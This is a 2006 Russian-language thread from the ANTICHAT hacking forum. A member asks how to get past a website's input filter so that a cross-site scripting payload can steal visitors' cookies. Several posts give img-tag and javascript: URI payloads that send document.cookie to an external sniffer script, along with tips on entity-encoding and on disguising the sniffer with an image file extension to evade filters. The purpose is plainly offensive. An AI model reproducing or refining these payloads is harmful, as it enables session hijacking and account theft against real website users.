HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Обойти фильтрацию!
  #1  
Старый 31.01.2006, 17:51
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию Обойти фильтрацию!

Подскажите как обойти следующую фильтрацию:

До фильтрации:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

или
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>

После фильтрации:

<img src=/'http://store-room.h15.ru/sniff/sniff.php?/'+document.cookie></img>

Как бы это обойти?
 
Ответить с цитированием

  #2  
Старый 31.01.2006, 19:18
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
С нами: 11269766

Репутация: 345


По умолчанию

мдя.... имхо тебе этот код ничего не даст. Надо чтобы текст интерпритировался браузером как ЯваКод. А тут просто адрес. И на снифф тебе придет ИП, реферер, а вместо кук document.cookie
 
Ответить с цитированием

  #3  
Старый 31.01.2006, 19:43
Electro
Участник форума
Регистрация: 23.10.2005
Сообщений: 276
С нами: 10814786

Репутация: 113
По умолчанию

Цитата:
Сообщение от NeX  
Подскажите как обойти следующую фильтрацию?
Мдя....эт точно!

Сниффер возвращает браузеру прозрачный GIF-файл размером 1x1 px. Это позволяет вызывать сниффер как непосредственно по ссылке в теге <a>, так и в качестве src тега <img>. Сам сниффер имеет расширение .jpg, что позволяет использовать его в обход фильтров, пропускающих только адреса картинок. А у тебя что??
Цитата:
<img src='http://store-room.h15.ru/sniff/sniff.php?'+document.cookie></img>
расширения php. Так не получется или я что то не так понял...щас не могу думать голова забита (
 
Ответить с цитированием

  #4  
Старый 31.01.2006, 21:39
pch
Познающий
Регистрация: 22.10.2005
Сообщений: 37
С нами: 10816148

Репутация: 141
По умолчанию

Попробуй
Код:
<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>
 
Ответить с цитированием

  #5  
Старый 01.02.2006, 14:39
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию

Цитата:
Сообщение от pch  
Попробуй
Код:
<img  src=javascript:aa=new&#x20;Image();aa.src=&quot;http://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>
че то не сработало =( Дай свою асю, поговорить надо.
 
Ответить с цитированием

  #6  
Старый 01.02.2006, 14:49
Xxor
Познающий
Регистрация: 24.01.2006
Сообщений: 33
С нами: 10680926

Репутация: 10
По умолчанию

Юзай античатовский снифер он с расшырением .gif должно пропустить
 
Ответить с цитированием

  #7  
Старый 02.02.2006, 11:33
Utochka
Постоянный
Регистрация: 21.12.2005
Сообщений: 620
С нами: 10729766

Репутация: 268


По умолчанию

Короче теперь такая трабла, вроде обошел фильтрацию вот этим:

<img src=javascript:aa=new&#x20;Image();aa.src=&quot;ht tp://store-room.h15.ru/sniff/sniff.php?&quot;+document.cookie;>

но он не хочет выполняться =( куки не приходят =(. Также пробовал с античатовским снифером ни хрена!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Подделка IP Ekstazi Уязвимости 6 11.10.2006 21:10
кто знает.....помогите обойти.... дым Болталка 10 12.05.2005 14:42
Как обойти сканер со значком ' Thief Уязвимости CMS / форумов 2 21.04.2005 12:07
Как обойти вставку моего сообщения в скрипт? (в блоге) Telepuz Уязвимости 1 18.04.2005 17:12
Как обойти фильтрацию по "маске"? (На примере форума http://www.securitylab.ru/forum) boffin Уязвимости CMS / форумов 7 03.04.2005 15:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.